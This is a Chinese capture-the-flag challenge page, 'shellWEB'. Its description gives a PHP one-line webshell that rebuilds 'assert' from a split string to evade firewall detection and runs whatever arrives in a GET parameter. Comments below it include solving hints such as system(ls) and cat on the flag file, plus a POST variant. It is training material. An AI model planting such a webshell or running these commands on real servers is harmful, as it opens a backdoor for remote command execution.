shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7461
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
a6819772 1月前

为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问

回复 0

TIMEtime 1月前

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);

回复 0

Cra2yNoob 2月前

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 1

banfang 3月前

点击场景,然后将描述发给豆包

回复 0

秋天在哪 3月前

为什么我的剑蚁连接超时?

回复 0

byhuang 4月前

flag{***}

回复 0

ubudj 4月前

分析代码,得到/?s=system(),用ls查看目录,找到文件。因为system函数能执行任何shell命令

回复 0

一个姓⎝李⎠的师傅~ 4月前

我的扩展里也解释了下,为何蚁剑能连接,大家可以看看,有不足的还希望互相探讨

回复 3

一个姓⎝李⎠的师傅~ 4月前

自己的解题思路:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#hjui5

回复 7

wywsssf 5月前

AI分析代码,参数格式为?s=system(''),先用ls目录,再用cat读取txt文件

回复 1

WriteUp

image
harry

3 金币

评分(10)

解题动态

麋elk 攻破了该题 1小时前
20230302211 攻破了该题 2小时前
yuluo 攻破了该题 2小时前
20230302240 攻破了该题 2小时前
容大晋 攻破了该题 5小时前
zhangyujie 攻破了该题 5小时前
18162807523 攻破了该题 6小时前
chm 攻破了该题 6小时前
nehcyll 攻破了该题 6小时前
hzl........ 攻破了该题 7小时前
覃允哥哥 攻破了该题 1天前
陈宇星 攻破了该题 1天前
18162865753 攻破了该题 1天前
gaojun123 攻破了该题 1天前
lye 攻破了该题 1天前
覃晴韵 攻破了该题 1天前
2406100127 攻破了该题 1天前
何林凤 攻破了该题 1天前
韦东妙 攻破了该题 1天前
adminmator 攻破了该题 1天前
问题反馈